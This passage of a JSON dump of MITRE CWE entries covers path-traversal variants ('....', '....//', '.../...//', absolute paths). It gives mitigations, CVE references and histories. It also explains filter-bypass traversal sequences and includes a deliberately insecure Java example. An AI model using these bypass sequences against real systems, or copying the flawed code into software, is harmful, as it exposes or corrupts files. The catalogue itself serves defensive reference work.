directory.","Extended_Description":{"xhtml:p":["This allows attackers to traverse the file system to access files or directories that are outside of the restricted directory.","The \'....\' manipulation is useful for bypassing some path traversal protection schemes. On some Windows systems, it is equivalent to \\"..\\\\..\\\\..\\" and might bypass checks that assume only two dots are valid. Incomplete filtering, such as removal of \\"./\\" sequences, can ultimately produce valid \\"..\\" sequences due to a collapse into unsafe value (CWE-182)."]},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"23","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity"],"Impact":["Read Files or Directories","Modify Files or Directories"]}},"Potential_Mitigations":{"Mitigation":[{"attr":{"@_Mitigation_ID":"MIT-5.1"},"Phase":"Implementation","Strategy":"Input Validation","Description":{"xhtml:p":["Assume all input is malicious. Use an \\"accept known good\\" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.","When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, \\"boat\\" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as \\"red\\" or \\"blue.\\"","Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code\'s environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright.","When validating filenames, use stringent allowlists that limit the character set to be used. If feasible, only allow a single \\".\\" character in the filename to avoid weaknesses such as CWE-23, and exclude directory separators such as \\"/\\" to avoid CWE-36. Use a list of allowable file extensions, which will help to avoid CWE-434.","Do not rely exclusively on a filtering mechanism that removes potentially dangerous characters. This is equivalent to a denylist, which may be incomplete (CWE-184). For example, filtering \\"/\\" is insufficient protection if the filesystem also supports the use of \\"\\\\\\" as a directory separator. Another possible error could occur when the filtering is applied in a way that still produces dangerous data (CWE-182). For example, if \\"../\\" sequences are removed from the \\".../...//\\" string in a sequential fashion, two instances of \\"../\\" would be removed from the original string, but the remaining characters would still form the \\"../\\" string."]},"Effectiveness":"High"},{"attr":{"@_Mitigation_ID":"MIT-20"},"Phase":"Implementation","Strategy":"Input Validation","Description":"Inputs should be decoded and canonicalized to the application\'s current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2000-0240","Description":"read files via \\"/........../\\" in URL","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0240"},{"Reference":"CVE-2000-0773","Description":"read files via \\"....\\" in web server","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0773"},{"Reference":"CVE-1999-1082","Description":"read files via \\"......\\" in web server (doubled triple dot?)","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1082"},{"Reference":"CVE-2004-2121","Description":"read files via \\"......\\" in web server (doubled triple dot?)","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2121"},{"Reference":"CVE-2001-0491","Description":"multiple attacks using \\"..\\", \\"...\\", and \\"....\\" in different commands","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0491"},{"Reference":"CVE-2001-0615","Description":"\\"...\\" or \\"....\\" in chat server","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0615"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"\'....\' (multiple dot)"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP16","Entry_Name":"Path Traversal"}]},"Notes":{"Note":{"#text":"Like the triple-dot CWE-32, this manipulation probably hides multiple weaknesses that should be made more explicit.","attr":{"@_Type":"Maintenance"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Maintenance_Notes, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description, Maintenance_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Description, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Potential_Mitigations"}],"Previous_Entry_Name":{"#text":"Path Issue - Multiple Dot - \'....\'","attr":{"@_Date":"2008-04-11"}}}},"34":{"attr":{"@_ID":"34","@_Name":"Path Traversal: \'....//\'","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software uses external input to construct a pathname that should be within a restricted directory, but it does not properly neutralize \'....//\' (doubled dot dot slash) sequences that can resolve to a location that is outside of that directory.","Extended_Description":{"xhtml:p":["This allows attackers to traverse the file system to access files or directories that are outside of the restricted directory.","The \'....//\' manipulation is useful for bypassing some path traversal protection schemes. If \\"../\\" is filtered in a sequential fashion, as done by some regular expression engines, then \\"....//\\" can collapse into the \\"../\\" unsafe value (CWE-182). It could also be useful when \\"..\\" is removed, if the operating system treats \\"//\\" and \\"/\\" as equivalent."]},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"23","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity"],"Impact":["Read Files or Directories","Modify Files or Directories"]}},"Detection_Methods":{"Detection_Method":[{"Method":"Automated Static Analysis - Source Code","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Source code Weakness Analyzer","Context-configured Source Code Weakness Analyzer"]}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Architecture or Design Review","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Inspection (IEEE 1028 standard) (can apply to requirements, design, source code, etc.)","Formal Methods / Correct-By-Construction"]}}]}},"Effectiveness":"High"}]},"Potential_Mitigations":{"Mitigation":[{"attr":{"@_Mitigation_ID":"MIT-5.1"},"Phase":"Implementation","Strategy":"Input Validation","Description":{"xhtml:p":["Assume all input is malicious. Use an \\"accept known good\\" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.","When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, \\"boat\\" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as \\"red\\" or \\"blue.\\"","Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code\'s environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright.","When validating filenames, use stringent allowlists that limit the character set to be used. If feasible, only allow a single \\".\\" character in the filename to avoid weaknesses such as CWE-23, and exclude directory separators such as \\"/\\" to avoid CWE-36. Use a list of allowable file extensions, which will help to avoid CWE-434.","Do not rely exclusively on a filtering mechanism that removes potentially dangerous characters. This is equivalent to a denylist, which may be incomplete (CWE-184). For example, filtering \\"/\\" is insufficient protection if the filesystem also supports the use of \\"\\\\\\" as a directory separator. Another possible error could occur when the filtering is applied in a way that still produces dangerous data (CWE-182). For example, if \\"../\\" sequences are removed from the \\".../...//\\" string in a sequential fashion, two instances of \\"../\\" would be removed from the original string, but the remaining characters would still form the \\"../\\" string."]},"Effectiveness":"High"},{"attr":{"@_Mitigation_ID":"MIT-20"},"Phase":"Implementation","Strategy":"Input Validation","Description":"Inputs should be decoded and canonicalized to the application\'s current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked."}]},"Observed_Examples":{"Observed_Example":{"Reference":"CVE-2004-1670","Description":"Mail server allows remote attackers to create arbitrary directories via a \\"..\\" or rename arbitrary files via a \\"....//\\" in user supplied parameters.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1670"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"\'....//\' (doubled dot dot slash)"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP16","Entry_Name":"Path Traversal"}]},"Notes":{"Note":{"#text":"This could occur due to a cleansing error that removes a single \\"../\\" from \\"....//\\"","attr":{"@_Type":"Relationship"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Relationship_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Description, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Observed_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Detection_Factors, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Potential_Mitigations"}],"Previous_Entry_Name":{"#text":"Path Issue - Doubled Dot Dot Slash - \'....//\'","attr":{"@_Date":"2008-04-11"}}}},"35":{"attr":{"@_ID":"35","@_Name":"Path Traversal: \'.../...//\'","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software uses external input to construct a pathname that should be within a restricted directory, but it does not properly neutralize \'.../...//\' (doubled triple dot slash) sequences that can resolve to a location that is outside of that directory.","Extended_Description":{"xhtml:p":["This allows attackers to traverse the file system to access files or directories that are outside of the restricted directory.","The \'.../...//\' manipulation is useful for bypassing some path traversal protection schemes. If \\"../\\" is filtered in a sequential fashion, as done by some regular expression engines, then \\".../...//\\" can collapse into the \\"../\\" unsafe value (CWE-182). Removing the first \\"../\\" yields \\"....//\\"; the second removal yields \\"../\\". Depending on the algorithm, the software could be susceptible to CWE-34 but not CWE-35, or vice versa."]},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"23","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity"],"Impact":["Read Files or Directories","Modify Files or Directories"]}},"Potential_Mitigations":{"Mitigation":[{"attr":{"@_Mitigation_ID":"MIT-5.1"},"Phase":"Implementation","Strategy":"Input Validation","Description":{"xhtml:p":["Assume all input is malicious. Use an \\"accept known good\\" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.","When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, \\"boat\\" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as \\"red\\" or \\"blue.\\"","Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code\'s environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright.","When validating filenames, use stringent allowlists that limit the character set to be used. If feasible, only allow a single \\".\\" character in the filename to avoid weaknesses such as CWE-23, and exclude directory separators such as \\"/\\" to avoid CWE-36. Use a list of allowable file extensions, which will help to avoid CWE-434.","Do not rely exclusively on a filtering mechanism that removes potentially dangerous characters. This is equivalent to a denylist, which may be incomplete (CWE-184). For example, filtering \\"/\\" is insufficient protection if the filesystem also supports the use of \\"\\\\\\" as a directory separator. Another possible error could occur when the filtering is applied in a way that still produces dangerous data (CWE-182). For example, if \\"../\\" sequences are removed from the \\".../...//\\" string in a sequential fashion, two instances of \\"../\\" would be removed from the original string, but the remaining characters would still form the \\"../\\" string."]},"Effectiveness":"High"},{"attr":{"@_Mitigation_ID":"MIT-20"},"Phase":"Implementation","Strategy":"Input Validation","Description":"Inputs should be decoded and canonicalized to the application\'s current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2005-2169","Description":"chain: \\".../...//\\" bypasses protection mechanism using regexp\'s that remove \\"../\\" resulting in collapse into an unsafe value \\"../\\" (CWE-182) and resultant path traversal.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2169"},{"Reference":"CVE-2005-0202","Description":"\\".../....///\\" bypasses regexp\'s that remove \\"./\\" and \\"../\\"","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0202"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"\'.../...//\'"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP16","Entry_Name":"Path Traversal"}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Description, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Observed_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Description, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Potential_Mitigations"}],"Previous_Entry_Name":{"#text":"Path Issue - Doubled Triple Dot Slash - \'.../...//\'","attr":{"@_Date":"2008-04-11"}}}},"36":{"attr":{"@_ID":"36","@_Name":"Absolute Path Traversal","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software uses external input to construct a pathname that should be within a restricted directory, but it does not properly neutralize absolute path sequences such as \\"/abs/path\\" that can resolve to a location that is outside of that directory.","Extended_Description":"This allows attackers to traverse the file system to access files or directories that are outside of the restricted directory.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"22","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"22","@_View_ID":"1305","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"22","@_View_ID":"1340","@_Ordinal":"Primary"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":[{"Scope":["Integrity","Confidentiality","Availability"],"Impact":"Execute Unauthorized Code or Commands","Note":"The attacker may be able to create or overwrite critical files that are used to execute code, such as programs or libraries."},{"Scope":"Integrity","Impact":"Modify Files or Directories","Note":"The attacker may be able to overwrite or create critical files, such as programs, libraries, or important data. If the targeted file is used for a security mechanism, then the attacker may be able to bypass that mechanism. For example, appending a new account at the end of a password file may allow an attacker to bypass authentication."},{"Scope":"Confidentiality","Impact":"Read Files or Directories","Note":"The attacker may be able read the contents of unexpected files and expose sensitive data. If the targeted file is used for a security mechanism, then the attacker may be able to bypass that mechanism. For example, by reading a password file, the attacker could conduct brute force password guessing attacks in order to break into an account on the system."},{"Scope":"Availability","Impact":"DoS: Crash, Exit, or Restart","Note":"The attacker may be able to overwrite, delete, or corrupt unexpected critical files such as programs, libraries, or important data. This may prevent the software from working at all and in the case of a protection mechanisms such as authentication, it has the potential to lockout every user of the software."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"attr":{"@_Demonstrative_Example_ID":"DX-18"},"Intro_Text":"In the example below, the path to a dictionary file is read from a system property and used to initialize a File object.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"String filename = System.getProperty(\\"com.domain.application.dictionaryFile\\");File dictionaryFile = new File(filename);","xhtml:br":""}},"Body_Text":"However, the path is not validated or modified to prevent it from containing relative or absolute path sequences before creating the File object. This allows anyone who can control the system property to determine what file is used. Ideally, the path should be resolved relative to some kind of application or user home directory."}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2002-1345","Description":"Multiple FTP clients write arbitrary files via absolute paths in server responses","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1345"},{"Reference":"CVE-2001-1269","Description":"ZIP file extractor allows full path","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1269"},{"Reference":"CVE-2002-1818","Description":"Path traversal using absolute pathname","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1818"},{"Reference":"CVE-2002-1913","Description":"Path traversal using absolute pathname","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1913"},{"Reference":"CVE-2005-2147","Description":"Path traversal using absolute pathname","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2147"},{"Reference":"CVE-2000-0614","Description":"Arbitrary files may be overwritten via compressed attachments that specify absolute path names for the decompressed output.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0614"},{"Reference":"CVE-1999-1263","Description":"Mail client allows remote attackers to overwrite arbitrary files via an e-mail message containing a uuencoded attachment that specifies the full pathname for the file to be modified.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1263"},{"Reference":"CVE-2003-0753","Description":"Remote attackers can read arbitrary files via a full pathname to the target file in config parameter.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0753"},{"Reference":"CVE-2002-1525","Description":"Remote attackers can read arbitrary files via an absolute pathname.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1525"},{"Reference":"CVE-2001-0038","Description":"Remote attackers can read arbitrary files by specifying the drive letter in the requested URL.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0038"},{"Reference":"CVE-2001-0255","Description":"FTP server allows remote attackers to list arbitrary directories by using the \\"ls\\" command and including the drive letter name (e.g. C:) in the requested pathname.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0255"},{"Reference":"CVE-2001-0933","Description":"FTP server allows remote attackers to list the contents of arbitrary drives via a ls command that includes the drive letter as an argument.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0933"},{"Reference":"CVE-2002-0466","Description":"Server allows remote attackers to browse arbitrary directories via a full pathname in the arguments to certain dynamic pages.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0466"},{"Reference":"CVE-2002-1483","Description":"Remote attackers can read arbitrary files via an HTTP request whose argument is a filename of the form \\"C:\\" (Drive letter), \\"//absolute/path\\", or \\"..\\" .","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1483"},{"Reference":"CVE-2004-2488","Description":"FTP server read/access arbitrary files using \\"C:\\\\\\" filenames","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2488"},{"Reference":"CVE-2001-0687","Description":"FTP server allows a remote attacker to retrieve privileged web server system information by specifying arbitrary paths in the UNC format (\\\\\\\\computername\\\\sharename).","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0687"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Absolute Path Traversal"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP16","Entry_Name":"Path Traversal"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"597"}}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 9, "Filenames and Paths", Page 503"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Sean Eidemiller","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"added/updated demonstrative examples"},{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Demonstrative_Examples, Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Common_Consequences, Demonstrative_Examples, Observed_Examples, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Demonstrative_Examples"}]}},"37":{"attr":{"@_ID":"37","@_Name":"Path Traversal: \'/absolute/pathname/here\'","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"A software system that accepts input in the form of a slash absolute path (\'/absolute/pathname/here\') without appropriate validation can allow an attacker to traverse the file system to unintended locations or access arbitrary files.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"36","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"160","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity"],"Impact":["Read Files or Directories","Modify Files or Directories"]}},"Potential_Mitigations":{"Mitigation":[{"attr":{"@_Mitigation_ID":"MIT-5.1"},"Phase":"Implementation","Strategy":"Input Validation","Description":{"xhtml:p":["Assume all input is malicious. Use an \\"accept known good\\" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.","When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, \\"boat\\" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as \\"red\\" or \\"blue.\\"","Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code\'s environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright.","When validating filenames, use stringent allowlists that limit the character set to be used. If feasible, only allow a single \\".\\" character in the filename to avoid 